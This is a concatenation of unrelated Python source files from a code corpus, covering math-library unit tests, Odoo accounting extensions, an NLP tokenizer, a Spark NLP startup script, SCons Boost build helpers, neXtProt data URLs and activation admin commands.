self.assertEqual(yammpy.ceil(0.0), 0)
self.assertEqual(yammpy.ceil(-0.0), 0)
def testCos(self):
self.assertEqual(yammpy.cos(0), 1)
self.assertEqual(yammpy.cos(yammpy.pi), -1)
self.assertTrue(yammpy.isnan(yammpy.cos(NAN)))
def testCosh(self):
self.assertEqual(yammpy.cosh(0), 1)
self.assertEqual(yammpy.cosh(2)-2*yammpy.cosh(1)**2, -1)
self.assertEqual(yammpy.cosh(INF), INF)
self.assertEqual(yammpy.cosh(NINF), INF)
self.assertTrue(yammpy.isnan(yammpy.cosh(NAN)))
def testErf(self):
self.assertEqual(yammpy.erf(-0), -0.000000)
self.assertEqual(yammpy.erf(INF), 1.000000)
def testErfc(self):
self.assertEqual(yammpy.erfc(NINF), 2.000000)
self.assertEqual(yammpy.erfc(INF), 0.000000)
def testExp(self):
self.assertEqual(yammpy.exp(-1), 1/yammpy.e)
self.assertEqual(yammpy.exp(0), 1)
self.assertEqual(yammpy.exp(1), yammpy.e)
self.assertEqual(yammpy.exp(INF), INF)
self.assertEqual(yammpy.exp(NINF), 0.)
self.assertTrue(yammpy.isnan(yammpy.exp(NAN)))
def testExp2(self):
self.assertEqual(yammpy.exp2(5), 32.000000)
self.assertEqual(yammpy.exp2(0.5), 1.4142135623730951)
self.assertEqual(yammpy.exp2(-4), 0.062500)
self.assertEqual(yammpy.exp2(-0.9), 0.5358867312681466)
self.assertEqual(yammpy.exp2(NINF), 0.000000)
self.assertEqual(yammpy.exp2(1024), INF)
def testExmp1(self):
self.assertEqual(yammpy.expm1(1), 1.718281828459045)
self.assertEqual(yammpy.expm1(-0), -0.000000)
self.assertEqual(yammpy.expm1(NINF), -1.000000)
self.assertEqual(yammpy.expm1(710), INF)
def testFabs(self):
self.assertEqual(yammpy.fabs(-1), 1)
self.assertEqual(yammpy.fabs(0), 0)
self.assertEqual(yammpy.fabs(1), 1)
def testFloor(self):
# self.assertEqual(int, type(yammpy.floor(0.5)))
self.assertEqual(yammpy.floor(0.5), 0)
self.assertEqual(yammpy.floor(1.0), 1)
self.assertEqual(yammpy.floor(1.5), 1)
self.assertEqual(yammpy.floor(-0.5), -1)
self.assertEqual(yammpy.floor(-1.0), -1)
self.assertEqual(yammpy.floor(-1.5), -2)
def testGamma(self):
self.assertEqual(yammpy.gamma(10), 362880.00000000006)
self.assertEqual(yammpy.gamma(0.5), 1.772453850905516)
self.assertEqual(yammpy.gamma(INF), INF)
def testLgamma(self):
self.assertEqual(yammpy.lgamma(10), 12.801827480081469)
self.assertEqual(yammpy.lgamma(0.5), 0.5723649429247001)
self.assertEqual(yammpy.lgamma(1), 0)
self.assertEqual(yammpy.lgamma(INF), INF)
self.assertEqual(yammpy.lgamma(0), INF)
def testLog(self):
self.assertEqual(yammpy.log(1/yammpy.e), -1)
self.assertEqual(yammpy.log(1), 0)
self.assertEqual(yammpy.log(yammpy.e), 1)
self.assertEqual(yammpy.log(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.log(NAN)))
def testLog2(self):
self.assertEqual(yammpy.log2(1), 0.0)
self.assertEqual(yammpy.log2(2), 1.0)
self.assertEqual(yammpy.log2(4), 2.0)
self.assertEqual(yammpy.log2(2**1023), 1023.0)
self.assertTrue(yammpy.isnan(yammpy.log2(NAN)))
def testLog10(self):
self.assertEqual(yammpy.log10(0.1), -1)
self.assertEqual(yammpy.log10(1), 0)
self.assertEqual(yammpy.log10(10), 1)
self.assertEqual(yammpy.log(INF), INF)
self.assertTrue(yammpy.isnan(yammpy.log10(NAN)))
def testLog1p(self):
for n in [2, 2**90, 2**300]:
self.assertAlmostEqual(yammpy.log1p(n), yammpy.log1p(float(n)))
self.assertEqual(yammpy.log1p(INF), INF)
def testLogb(self):
self.assertEqual(yammpy.logb(0), -INF)
def testNearbyint(self):
self.assertEqual(yammpy.nearbyint(2.3), 2.0)
self.assertEqual(yammpy.nearbyint(-2.3), -2.0)
self.assertEqual(yammpy.nearbyint(2.5), 2.0)
self.assertEqual(yammpy.nearbyint(INF), INF)
def testSin(self):
self.assertEqual(yammpy.sin(0), 0)
self.assertEqual(yammpy.sin(yammpy.pi/2), 1)
self.assertEqual(yammpy.sin(-yammpy.pi/2), -1)
self.assertTrue(yammpy.isnan(yammpy.sin(NAN)))
def testSinh(self):
self.assertAlmostEqual(yammpy.sinh(0), 0)
self.assertAlmostEqual(yammpy.sinh(1)**2-yammpy.cosh(1)**2, -1)
self.assertAlmostEqual(yammpy.sinh(1)+yammpy.sinh(-1), 0)
self.assertAlmostEqual(yammpy.sinh(INF), INF)
self.assertAlmostEqual(yammpy.sinh(NINF), NINF)
self.assertTrue(yammpy.isnan(yammpy.sinh(NAN)))
def testTan(self):
self.assertAlmostEqual(yammpy.tan(0), 0)
self.assertAlmostEqual(yammpy.tan(yammpy.pi/4), 1)
self.assertAlmostEqual(yammpy.tan(-yammpy.pi/4), -1)
self.assertTrue(yammpy.isnan(yammpy.tan(NAN)))
def testTanh(self):
self.assertEqual(yammpy.tanh(0), 0)
self.assertEqual(yammpy.tanh(INF), 1)
self.assertEqual(yammpy.tanh(NINF), -1)
self.assertTrue(yammpy.isnan(yammpy.tanh(NAN)))
def testTrunc(self):
self.assertEqual(yammpy.trunc(1), 1)
self.assertEqual(yammpy.trunc(-1), -1)
# self.assertEqual(type(yammpy.trunc(1)), int)
# self.assertEqual(type(yammpy.trunc(1.5)), int)
self.assertEqual(yammpy.trunc(1.5), 1)
self.assertEqual(yammpy.trunc(-1.5), -1)
self.assertEqual(yammpy.trunc(1.999999), 1)
self.assertEqual(yammpy.trunc(-1.999999), -1)
self.assertEqual(yammpy.trunc(-0.999999), -0)
self.assertEqual(yammpy.trunc(-100.999), -100)
def testAtan2(self):
self.assertEqual(yammpy.atan2(-1, 0), -yammpy.pi/2)
self.assertEqual(yammpy.atan2(-1, 1), -yammpy.pi/4)
self.assertEqual(yammpy.atan2(0, 1), 0)
self.assertEqual(yammpy.atan2(1, 1), yammpy.pi/4)
self.assertEqual(yammpy.atan2(1, 0), yammpy.pi/2)
self.assertEqual(yammpy.atan2(0., NINF), yammpy.pi)
self.assertEqual(yammpy.atan2(0., -2.3), yammpy.pi)
self.assertEqual(yammpy.atan2(0., -0.), yammpy.pi)
self.assertEqual(yammpy.atan2(0., 0.), 0.)
self.assertEqual(yammpy.atan2(0., 2.3), 0.)
self.assertEqual(yammpy.atan2(0., INF), 0.)
def testCopysign(self):
self.assertEqual(yammpy.copysign(1, 42), 1.0)
self.assertEqual(yammpy.copysign(0., 42), 0.0)
self.assertEqual(yammpy.copysign(1., -42), -1.0)
self.assertEqual(yammpy.copysign(3, 0.), 3.0)
self.assertEqual(yammpy.copysign(4., -0.), -4.0)
self.assertEqual(yammpy.copysign(1., 0.), 1.)
self.assertEqual(yammpy.copysign(1., -0.), -1.)
self.assertEqual(yammpy.copysign(INF, 0.), INF)
self.assertEqual(yammpy.copysign(INF, -0.), NINF)
self.assertEqual(yammpy.copysign(NINF, 0.), INF)
self.assertEqual(yammpy.copysign(NINF, -0.), NINF)
    def testFdim(self):
        """fdim should return the positive difference of its arguments."""
        self.assertEqual(yammpy.fdim(4, 1), 3)
        self.assertEqual(yammpy.fdim(4, -1), 5)
        self.assertEqual(yammpy.fdim(8, 1), 7)
        self.assertEqual(yammpy.fdim(10, -10), 20)
    def testHypot(self):
        """hypot on a 5-12-13 triple; any infinite leg yields +inf."""
        self.assertEqual(yammpy.hypot(12.0, 5.0), 13.0)
        self.assertEqual(yammpy.hypot(12, 5), 13)
        self.assertEqual(yammpy.hypot(0, INF), INF)
        self.assertEqual(yammpy.hypot(10, INF), INF)
        self.assertEqual(yammpy.hypot(-10, INF), INF)
        self.assertEqual(yammpy.hypot(-INF, INF), INF)
        self.assertEqual(yammpy.hypot(-INF, -INF), INF)
        self.assertEqual(yammpy.hypot(10, -INF), INF)
    def testPow(self):
        """pow on small bases/exponents; 1**(+/-inf) is defined as 1."""
        self.assertEqual(yammpy.pow(0,1), 0)
        self.assertEqual(yammpy.pow(1,0), 1)
        self.assertEqual(yammpy.pow(2,1), 2)
        self.assertEqual(yammpy.pow(2,-1), 0.5)
        self.assertEqual(yammpy.pow(INF, 1), INF)
        self.assertEqual(yammpy.pow(NINF, 1), NINF)
        self.assertEqual((yammpy.pow(1, INF)), 1.)
        self.assertEqual((yammpy.pow(1, NINF)), 1.)
    def testFmod(self):
        """fmod keeps the dividend's sign; NaN propagates; x % inf == x."""
        self.assertEqual(yammpy.fmod(10, 1), 0.0)
        self.assertEqual(yammpy.fmod(10, 0.5), 0.0)
        self.assertEqual(yammpy.fmod(10, 1.5), 1.0)
        self.assertEqual(yammpy.fmod(-10, 1), -0.0)
        self.assertEqual(yammpy.fmod(-10, 0.5), -0.0)
        self.assertEqual(yammpy.fmod(-10, 1.5), -1.0)
        self.assertTrue(yammpy.isnan(yammpy.fmod(NAN, 1.)))
        self.assertTrue(yammpy.isnan(yammpy.fmod(1., NAN)))
        self.assertTrue(yammpy.isnan(yammpy.fmod(NAN, NAN)))
        self.assertEqual(yammpy.fmod(3.0, INF), 3.0)
        self.assertEqual(yammpy.fmod(-3.0, INF), -3.0)
        self.assertEqual(yammpy.fmod(3.0, NINF), 3.0)
        self.assertEqual(yammpy.fmod(-3.0, NINF), -3.0)
        self.assertEqual(yammpy.fmod(0.0, 3.0), 0.0)
        self.assertEqual(yammpy.fmod(0.0, NINF), 0.0)
    def testRemainder(self):
        """IEEE remainder (round-to-nearest quotient) and signed zeros."""
        self.assertEqual(yammpy.remainder(+5.1, +3.0), -0.9000000000000004)
        self.assertEqual(yammpy.remainder(-5.1, +3.0), 0.9000000000000004)
        self.assertEqual(yammpy.remainder(+5.1, -3.0), -0.9000000000000004)
        self.assertEqual(yammpy.remainder(-5.1, -3.0), 0.9000000000000004)
        self.assertEqual(yammpy.remainder(+0.0, 1.0), 0.0)
        self.assertEqual(yammpy.remainder(-0.0, 1.0), -0.0)
        self.assertEqual(yammpy.remainder(+5.1, INF), 5.1)
    def testSqrt(self):
        """sqrt of perfect squares, infinity and NaN propagation."""
        self.assertEqual(yammpy.sqrt(0), 0)
        self.assertEqual(yammpy.sqrt(1), 1)
        self.assertEqual(yammpy.sqrt(4), 2)
        self.assertEqual(yammpy.sqrt(INF), INF)
        self.assertTrue(yammpy.isnan(yammpy.sqrt(NAN)))
    def testDegrees(self):
        """Radian-to-degree conversion at the usual reference angles."""
        self.assertEqual(yammpy.degrees(yammpy.pi), 180.0)
        self.assertEqual(yammpy.degrees(yammpy.pi/2), 90.0)
        self.assertEqual(yammpy.degrees(-yammpy.pi/4), -45.0)
        self.assertEqual(yammpy.degrees(0), 0)
    def testRadians(self):
        """Degree-to-radian conversion at the usual reference angles."""
        self.assertEqual(yammpy.radians(180), yammpy.pi)
        self.assertEqual(yammpy.radians(90), yammpy.pi/2)
        self.assertEqual(yammpy.radians(-45), -yammpy.pi/4)
        self.assertEqual(yammpy.radians(0), 0)
    def testSum(self):
        """sum over empty, int, float and mixed int/float lists."""
        self.assertEqual(yammpy.sum([]), 0)
        self.assertEqual(yammpy.sum([1, 2, 3, 4, 5]), 15)
        self.assertEqual(yammpy.sum([1.0, 2.0, 3.0, 4.0, 5.0]), 15.0)
        self.assertEqual(yammpy.sum([1, 2, 3, 4.0, 5.0]), 15.0)
        self.assertEqual(yammpy.sum([1.0, 2.0, 3.0, 4, 5]), 15.0)
    def testProd(self):
        """prod over empty (identity 1), int, float and mixed lists."""
        self.assertEqual(yammpy.prod([]), 1)
        self.assertEqual(yammpy.prod([1, 2, 3, 4, 5]), 120)
        self.assertEqual(yammpy.prod([1.0, 2.0, 3.0, 4.0, 5.0]), 120.0)
        self.assertEqual(yammpy.prod([1, 2, 3, 4.0, 5.0]), 120.0)
        self.assertEqual(yammpy.prod([1.0, 2.0, 3.0, 4, 5]), 120.0)
    def testIsfinite(self):
        """isfinite is True for ordinary floats, False for NaN/infinities."""
        self.assertTrue(yammpy.isfinite(0.0))
        self.assertTrue(yammpy.isfinite(-0.0))
        self.assertTrue(yammpy.isfinite(1.0))
        self.assertTrue(yammpy.isfinite(-1.0))
        self.assertFalse(yammpy.isfinite(float("nan")))
        self.assertFalse(yammpy.isfinite(float("inf")))
        self.assertFalse(yammpy.isfinite(float("-inf")))
    def testIsinf(self):
        """isinf detects both infinities (1E400 overflows to inf)."""
        self.assertTrue(yammpy.isinf(float("inf")))
        self.assertTrue(yammpy.isinf(float("-inf")))
        self.assertTrue(yammpy.isinf(1E400))
        self.assertTrue(yammpy.isinf(-1E400))
        self.assertFalse(yammpy.isinf(float("nan")))
        self.assertFalse(yammpy.isinf(0.))
        self.assertFalse(yammpy.isinf(1.))
    def testIsnan(self):
        """isnan detects NaN (including inf * 0) but not infinities."""
        self.assertTrue(yammpy.isnan(float("nan")))
        self.assertTrue(yammpy.isnan(float("-nan")))
        self.assertTrue(yammpy.isnan(float("inf") * 0.))
        self.assertFalse(yammpy.isnan(float("inf")))
        self.assertFalse(yammpy.isnan(0.))
        self.assertFalse(yammpy.isnan(1.))
    def testIsperfsqr(self):
        """isperfsqr recognises perfect squares and rejects near-misses."""
        self.assertTrue(yammpy.isperfsqr(4))
        self.assertTrue(yammpy.isperfsqr(209764))
        self.assertTrue(yammpy.isperfsqr(616225))
        self.assertFalse(yammpy.isperfsqr(5))
        self.assertFalse(yammpy.isperfsqr(209765))
# Run the suite when the file is executed directly.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
43902 | # coding: utf-8
# Copyright 2016 Vauxoo (https://www.vauxoo.com) <<EMAIL>>
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import re
from odoo import models, api, fields, _
class AccountJournal(models.Model):
    # Extends journal creation so Mexican companies get the SAT account tags.
    _inherit = 'account.journal'
    @api.model
    def _prepare_liquidity_account(self, name, company, currency_id, type):
        '''
        When preparing the values to use when creating the default debit and credit accounts of a
        liquidity journal, set the correct tags for the mexican localization.

        Only companies whose country is Mexico (``base.mx``) are affected; for
        every other company the values returned by ``super()`` are untouched.
        '''
        res = super(AccountJournal, self)._prepare_liquidity_account(name, company, currency_id, type)
        if company.country_id.id == self.env.ref('base.mx').id:
            # Derive the localization tags from the generated account code.
            mx_tags = self.env['account.account'].mx_search_tags(res.get('code', ''))
            if mx_tags:
                # (6, 0, ids) replaces the whole tag list with these tags.
                res.update({
                    'tag_ids': [(6, 0, [tag.id for tag in mx_tags])]
                })
        return res
class AccountAccount(models.Model):
    """Account extension that auto-assigns Mexican localization tags."""
    _inherit = 'account.account'

    @api.model
    def mx_search_tags(self, code):
        """Return the tag (color 4) matching an account *code*, or an empty
        recordset when the code does not follow the "NNN.NN.NN(N)" pattern
        (dot- or comma-separated, first group between 100 and 899)."""
        tag_model = self.env['account.account.tag']
        match = re.search(
            '^(?P<first>[1-8][0-9][0-9])[,.]'
            '(?P<second>[0-9][0-9])[,.]'
            '(?P<third>[0-9]{2,3})$', code)
        # Codes outside the auto-assignation pattern get no tag at all.
        if not match:
            return tag_model
        first, second = match.group('first'), match.group('second')
        # Matching tags are named "<first>.<second>..." and use color 4.
        domain = [
            ('name', '=like', "%s.%s%%" % (first, second)),
            ('color', '=', 4),
        ]
        return tag_model.search(domain, limit=1)

    @api.onchange('code')
    def _onchange_code(self):
        """Refresh the tags whenever the code changes on a Mexican company."""
        is_mx_company = self.company_id.country_id.id == self.env.ref('base.mx').id
        if is_mx_company and self.code:
            self.tag_ids = self.mx_search_tags(self.code)
class AccountAccountTag(models.Model):
    _inherit = 'account.account.tag'
    # 'D'/'A' encode the account nature (debit vs. credit) as required by
    # the Mexican electronic accounting report.
    nature = fields.Selection([
        ('D', 'Debitable Account'), ('A', 'Creditable Account')],
        help='Used in Mexican report of electronic accounting (account nature).')
| StarcoderdataPython |
144492 | """This module is used for preprocessing user inputs before further analysis.
The user utterance is broken into tokens which contain additional information
about the it.
"""
from typing import Text, List, Optional
import string
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
class Token:
    """Subpart of an utterance.

    Stores the mapping of start and end character positions back into the
    original utterance (as a half-open interval ``[start, end)``), together
    with the lemmatized version of the token and whether it is a stopword.
    """

    def __init__(self,
                 text: Text,
                 start: int,
                 end: Optional[int] = None,
                 lemma: Optional[Text] = None,
                 is_stopword: Optional[bool] = False) -> None:
        self.text = text
        self.start = start
        # Default end position is derived from the token's own length.
        self.end = end if end else start + len(text)
        # Fall back to the surface form when no lemma was computed.
        self.lemma = lemma if lemma else text
        self.is_stopword = is_stopword

    def overlaps(self, other) -> bool:
        """Checks whether two tokens overlap in the original utterance.

        Two half-open spans ``[a, b)`` and ``[c, d)`` overlap iff
        ``a < d and c < b``.  The previous pairwise comparison wrongly
        returned False for tokens sharing the same start offset and True
        for tokens that were merely adjacent (``self.end == other.start``);
        both cases are fixed by the symmetric interval test below.

        Args:
            other (Token): Token to compare against

        Returns:
            bool: True if there is overlap.
        """
        return self.start < other.end and other.start < self.end

    def __lt__(self, other):
        # Order tokens by their position in the utterance.
        return (self.start, self.end) < (other.start, other.end)

    def __add__(self, other):
        # Merging two tokens concatenates text and lemma in utterance order
        # and spans from the earlier start to the later token's end.
        sorted_tokens = sorted((self, other))
        text = ' '.join(token.text for token in sorted_tokens)
        lemma = ' '.join(token.lemma for token in sorted_tokens)
        return Token(text, sorted_tokens[0].start, sorted_tokens[1].end, lemma)

    def __radd__(self, other):
        # Support sum(tokens): the initial integer 0 acts as the identity.
        if other == 0:
            return self
        else:
            return self.__add__(other)
class TextProcess:
    """Collection of helpers used to preprocess user utterances."""

    def __init__(self, additional_stop_words: List[Text] = None) -> None:
        base_stop_words = stopwords.words('english')
        if additional_stop_words:
            base_stop_words.extend(additional_stop_words)
        self._stop_words = set(base_stop_words)
        self._lemmatizer = WordNetLemmatizer()
        # Apostrophes are kept so contractions survive the punctuation strip.
        self._punctuation = set(string.punctuation.replace('\'', ''))

    def process_text(self, text: Text) -> List[Token]:
        """Split *text* into Tokens that can be mapped back to the input.

        Args:
            text (Text): Input text, user utterance.

        Returns:
            List[Token]: List of Tokens
        """
        without_punctuation = self.remove_punctuation(text)
        words = without_punctuation.split()  # word_tokenize(without_punctuation)
        return self.tokenize(words, text)

    def remove_punctuation(self, text: Text) -> Text:
        """Return *text* with punctuation (except apostrophes) blanked out.

        Args:
            text (str): Sentence.

        Returns:
            str: Sentence without punctuation.
        """
        cleaned = []
        for ch in text:
            cleaned.append(' ' if ch in self._punctuation else ch)
        return ''.join(cleaned)

    def lemmatize_text(self, text: Text) -> Text:
        """Return the lowercase lemma of *text* (apostrophes stripped).

        Args:
            text (Text): Input text.

        Returns:
            Text: Lemmatized string.
        """
        without_apostrophes = text.replace('\'', '')
        return self._lemmatizer.lemmatize(without_apostrophes.lower())

    def tokenize(self, word_tokens: List[Text], text: Text) -> List[Token]:
        """Locate each word in *text* and wrap it in a Token.

        Args:
            word_tokens (List[Text]): Words extracted from the text.
            text (Text): Original sentence the words came from.

        Returns:
            List[Token]: List of tokens.
        """
        tokens: List[Token] = []
        cursor = 0
        for word in word_tokens:
            start = text.index(word, cursor)
            cursor = start + len(word)
            tokens.append(Token(word,
                                start,
                                cursor,
                                self.lemmatize_text(word),
                                word in self._stop_words))
        return tokens
| StarcoderdataPython |
1662228 | <reponame>DevinTDHa/spark-nlp-workshop
import json
import os
# Load the John Snow Labs license/secret key-value pairs from disk.
with open('license.json') as f:
    license_keys = json.load(f)
# Defining license key-value pairs as local variables
# NOTE: at module level locals() is the module namespace, so names such as
# SECRET (used below) become available as globals -- assumes license.json
# actually contains a SECRET entry.
locals().update(license_keys)
# Adding license key-value pairs to environment variables
os.environ.update(license_keys)
from pyspark.ml import Pipeline,PipelineModel
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
from sparknlp.annotator import *
from sparknlp_jsl.annotator import *
from sparknlp.base import *
import sparknlp_jsl
import sparknlp
import warnings
warnings.filterwarnings('ignore')
# JVM sizing for the local Spark session started below.
params = {"spark.driver.memory":"16G",
"spark.kryoserializer.buffer.max":"2000M",
"spark.driver.maxResultSize":"2000M"}
print ("Spark NLP Version :", sparknlp.version())
print ("Spark NLP_JSL Version :", sparknlp_jsl.version())
# SECRET comes from license.json (via locals().update above).
spark = sparknlp_jsl.start(SECRET,params=params)
from sparknlp.pretrained import PretrainedPipeline
# Download the pretrained clinical pipeline and run it on a sample term.
ner_pipeline = PretrainedPipeline("ner_model_finder", "en", "clinical/models")
result = ner_pipeline.annotate("medication")
print(100*'-')
print(result)
print(100*'-')
def fatorial(num: int) -> int:
    """Return the factorial of ``num``.

    ``num`` is expected to be a natural number (a non-negative integer);
    any value below 2 simply yields 1.

    :param num: int
    :return: int
    """
    resultado = 1
    for fator in range(2, num + 1):
        resultado *= fator
    return resultado


print(fatorial(5))
1742886 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
********************************
reslib.data.merges
********************************
This module contains code to merge common datasets (e.g. add permnos to gvkeys, etc.)
:copyright: (c) 2019 by <NAME>.
:license: MIT, see LICENSE for more details.
""" | StarcoderdataPython |
1747574 |
# Copyright <NAME> 2011-2017
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#-------------------------------------------------------------------------------
# Boost Library Methods
#-------------------------------------------------------------------------------
# SCons Imports
from SCons.Script import AlwaysBuild, Flatten
# Cuppa Imports
from cuppa.colourise import colour_items
from cuppa.log import logger
# Boost Imports
from cuppa.dependencies.boost.boost_builder import BoostLibraryBuilder
class BoostStaticLibraryMethod(object):
    """Callable installed on the SCons environment that builds the requested
    Boost libraries as static libraries."""
    def __init__( self, add_dependents=False, build_always=False, verbose_build=False, verbose_config=False ):
        self._add_dependents = add_dependents
        self._build_always = build_always
        self._verbose_build = verbose_build
        self._verbose_config = verbose_config
    def __call__( self, env, libraries ):
        """Build *libraries* (a name or list of names) as static Boost libs."""
        if not self._add_dependents:
            logger.warn( "BoostStaticLibrary() is deprecated, use BoostStaticLibs() or BoostStaticLib() instead" )
        libraries = Flatten( [ libraries ] )
        # Make sure the boost dependency is configured on this environment.
        if not 'boost' in env['BUILD_WITH']:
            env.BuildWith( 'boost' )
        Boost = env['dependencies']['boost']( env )
        logger.trace( "Build static libraries [{}]".format( colour_items( libraries ) ) )
        library = BoostLibraryBuilder(
                Boost,
                add_dependents = self._add_dependents,
                verbose_build = self._verbose_build,
                verbose_config = self._verbose_config )( env, None, None, libraries, 'static' )
        if self._build_always:
            return AlwaysBuild( library )
        else:
            return library
class BoostSharedLibraryMethod(object):
    """Callable installed on the SCons environment that builds the requested
    Boost libraries as shared libraries."""

    # Libraries that need a *_DYN_LINK define when linked dynamically.
    _dyn_link_defines = {
        'chrono':     'BOOST_CHRONO_DYN_LINK',
        'filesystem': 'BOOST_FILESYSTEM_DYN_LINK',
        'date_time':  'BOOST_DATE_TIME_DYN_LINK',
        'regex':      'BOOST_REGEX_DYN_LINK',
        'system':     'BOOST_SYSTEM_DYN_LINK',
    }

    def __init__( self, add_dependents=False, build_always=False, verbose_build=False, verbose_config=False ):
        self._add_dependents = add_dependents
        self._build_always = build_always
        self._verbose_build = verbose_build
        self._verbose_config = verbose_config

    def __call__( self, env, libraries ):
        """Build *libraries* (a name or list of names) as shared Boost libs."""
        if not self._add_dependents:
            logger.warn( "BoostSharedLibrary() is deprecated, use BoostSharedLibs() or BoostSharedLib() instead" )
        libraries = Flatten( [ libraries ] )
        if not 'boost' in env['BUILD_WITH']:
            env.BuildWith( 'boost' )
        Boost = env['dependencies']['boost']( env )
        for name in libraries:
            # Every boost.log variant shares the same define.
            if name.startswith('log'):
                env.AppendUnique( CPPDEFINES = 'BOOST_LOG_DYN_LINK' )
            elif name in self._dyn_link_defines:
                env.AppendUnique( CPPDEFINES = self._dyn_link_defines[name] )
        built = BoostLibraryBuilder(
                Boost,
                add_dependents = self._add_dependents,
                verbose_build = self._verbose_build,
                verbose_config = self._verbose_config )( env, None, None, libraries, 'shared' )
        return AlwaysBuild( built ) if self._build_always else built
| StarcoderdataPython |
1638099 | # -*- coding: utf-8 -*-
from bio2bel import get_data_dir
MODULE_NAME = 'nextprot'
DATA_DIR = get_data_dir(MODULE_NAME)
# This file is a list of terms; one per line
ACCESSIONS_URL = 'ftp://ftp.nextprot.org/pub/current_release/ac_lists/nextprot_ac_list_all.txt'
# CV files each have their own specification described at their top
CV_FAMILY_URL = 'ftp://ftp.nextprot.org/pub/current_release/controlled_vocabularies/cv_family.txt'
CV_DOMAIN_URL = 'ftp://ftp.nextprot.org/pub/current_release/controlled_vocabularies/cv_domain.txt'
# Mapping files have a first column with NX accession numbers, then a second with the mapping accession
ENTREZ_MAPPING_URL = 'ftp://ftp.nextprot.org/pub/current_release/mapping/nextprot_geneid.txt'
HGNC_MAPPING_URL = 'ftp://ftp.nextprot.org/pub/current_release/mapping/nextprot_hgnc.txt'
| StarcoderdataPython |
1765306 | <filename>adminacttools/actadmcmds/actadmcmds.py<gh_stars>0
#
# Copyright (C) 2010-2012 Opersys inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Commands for activation.
import sys, os, readline, acttools
import ConfigParser
# kpython
from kfile import *
from kreadline import Command
def dump_KAP(kap):
    """Summarize a KAP object as three comma-joined display lines.

    Line 1 shows the key id and KDN, line 2 the presence of the three
    e-mail keys, line 3 the presence of the bundle and license.
    """
    def present(value):
        # "yes"/"no" depending on whether the attribute is set.
        return "yes" if value is not None else "no"
    ids = [
        "Key ID: %s" % (kap.key_id if kap.key_id is not None else "no"),
        "KDN: %s" % (kap.kdn if kap.kdn is not None else "no"),
    ]
    keys = [
        "Pub. Sig. Key: %s" % present(kap.email_sig_pkey),
        "Priv. Sig. Key: %s" % present(kap.email_sig_skey),
        "Pub. Enc. Key: %s" % present(kap.email_enc_pkey),
    ]
    payload = [
        "Bundle: %s" % present(kap.bundle),
        "License: %s" % present(kap.license),
    ]
    return [", ".join(part) for part in (ids, keys, payload)]
class LsActivatorCommand(Command):
    """Interactive command: list every activator with its details."""
    Name = "lsactivator"
    Syntax = ""
    Help = "List the activators."
    MaxParams = 0
    MinParams = 0
    def run(self, intr):
        """Print each activator's identity, key set, step and KAPs to stdout."""
        acts = acttools.list_activators(intr.basedir)
        for act in acts:
            sys.stdout.write("%s\n" % act.name)
            # An activator needs both an identity and a key set to be valid.
            is_invalid = False
            sys.stdout.write("\tIdentity: ")
            if act.identity:
                sys.stdout.write(act.identity.id_name + "\n")
            else:
                is_invalid = True
                sys.stdout.write("None or unknown.\n")
            if act.parent_identity:
                sys.stdout.write("\tParent identity: " + act.parent_identity.id_name + "\n")
            sys.stdout.write("\tKey set: ")
            if act.keyset:
                sys.stdout.write(act.keyset.keys_name + "\n")
            else:
                is_invalid = True
                sys.stdout.write("None.\n")
            if act.step:
                sys.stdout.write("\tStep number: %d\n" % act.step)
            if is_invalid:
                sys.stdout.write("\t*** This activator is invalid.\n")
            if act.identity and act.keyset:
                kaps = act.list_KAP()
                for k in kaps:
                    (kn, kap, _) = k
                    sys.stdout.write("\tKAP: %s\n" % kn)
                    lines = dump_KAP(kap)
                    for l in lines:
                        sys.stdout.write("\t\t%s\n" % l)
        return 0
class LsKeysCommand(Command):
    """Interactive command: list the key sets and their completeness."""
    Name = "lskeys"
    Syntax = ""
    Help = "List the key sets."
    MaxParams = 0
    MinParams = 0
    def run(self, intr):
        """Print, for each key set, whether each key pair is complete."""
        def has_pair(k, n):
            # Report "OK"/"Missing"/"Incomplete!" for the <n>_skey/<n>_pkey pair.
            skey = n + "_skey"
            pkey = n + "_pkey"
            has_skey = hasattr(k, skey) and not getattr(k, skey) is None
            has_pkey = hasattr(k, pkey) and not getattr(k, pkey) is None
            if has_skey and has_pkey:
                return "OK"
            elif not has_skey and not has_pkey:
                return "Missing"
            elif (has_skey and not has_pkey) or (not has_skey and has_pkey):
                return "Incomplete!"
        keysets = acttools.list_keys(intr.basedir)
        for k in keysets:
            sys.stdout.write("%s\n" % k.keys_name)
            sys.stdout.write("\tPre-activation keys: ")
            sys.stdout.write(has_pair(k, 'enc_zero') + "\n")
            sys.stdout.write("\tEncryption keys: ")
            sys.stdout.write(has_pair(k, 'enc') + "\n")
            sys.stdout.write("\tSignature keys: ")
            sys.stdout.write(has_pair(k, 'sig') + "\n")
        return 0
class LsIdentityCommand(Command):
    """Interactive command: list the identities stored on disk."""
    Name = "lsidentity"
    Syntax = ""
    Help = "List the identities on the disk."
    MaxParams = 0
    MinParams = 0
    def run(self, intr):
        """Print each identity's certificate fields, admin, KDN and status."""
        identities = acttools.list_identity(intr.basedir)
        for ident in identities:
            sys.stdout.write("%s\n" % ident.id_name)
            z = (ident.country,
                 ident.state,
                 ident.location,
                 ident.org,
                 ident.org_unit,
                 ident.domain,
                 ident.email)
            sys.stdout.write("\t C: %s\n\t ST:%s\n\t L: %s\n\t O: %s\n\t OU:%s\n\t CN:%s\n\t @: %s\n" % z)
            z = (ident.admin_name, ident.admin_email)
            sys.stdout.write("\tAdmin: %s <%s>\n" % z)
            sys.stdout.write("\tKDN: %s\n" % (ident.kdn if not ident.kdn is None else "None"))
            if ident.asserted:
                sys.stdout.write("\t*** This identity has been asserted.\n")
            else:
                sys.stdout.write("\tThis identity has not been asserted.\n")
        return 0
class NewIdentityCommand(Command):
    """Interactive command: create a new identity for activation."""
    Name = "newidentity"
